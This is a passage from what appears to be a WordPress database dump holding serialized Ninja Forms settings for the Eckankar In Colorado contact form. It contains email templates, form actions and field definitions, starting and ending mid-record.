{field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:50;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:51;}i:3;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:11:\"Admin Email\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3501:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new \"Eckankar in Colorado Contact\" form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br /><br />\r\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_303}</span><br /><br /><br />\r\n <br /><br /><br />\r\n<span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:52;}i:4;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:4:\"type\";s:9:\"recaptcha\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-09-20 09:08:36\";s:5:\"label\";s:12:\"reCAPTCHA v3\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:7:\"message\";s:170:\"This action adds users to WordPress&#039; personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site&#039;s front end.\";s:5:\"score\";s:3:\"0.5\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:240;}}s:8:\"settings\";a:30:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:0;s:5:\"title\";s:33:\"Eckankar In Colorado Contact Form\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:48\";s:10:\"form_title\";s:33:\"Eckankar In Colorado Contact Form\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";i:1;s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:18:\"html_1663798083380\";i:9;s:10:\"submit_278\";}s:17:\"default_label_pos\";s:5:\"above\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(14,'a:7:{s:2:\"id\";i:14;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:1169:\"<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Johnstown Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1515012877904\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:18:\"html_1515012877904\";}s:2:\"id\";i:142;}i:1;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:10:\"First Name\";s:4:\"type\";s:9:\"firstname\";s:3:\"key\";s:23:\"firstname_1515012036721\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:23:\"firstname_1515012036721\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:143;}i:2;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:4:\"type\";s:8:\"lastname\";s:3:\"key\";s:22:\"lastname_1515012040393\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:22:\"lastname_1515012040393\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:144;}i:3;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:4:\"type\";s:5:\"email\";s:3:\"key\";s:19:\"email_1515012046399\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:19:\"email_1515012046399\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:145;}i:4;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Phone\";s:4:\"type\";s:5:\"phone\";s:3:\"key\";s:19:\"phone_1515012055554\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:19:\"phone_1515012055554\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:146;}i:5;a:2:{s:8:\"settings\";a:17:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:15:\"Your Local Area\";s:4:\"type\";s:10:\"listselect\";s:3:\"key\";s:29:\"your_local_area_1515013258725\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:16:\"Please Selectone\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 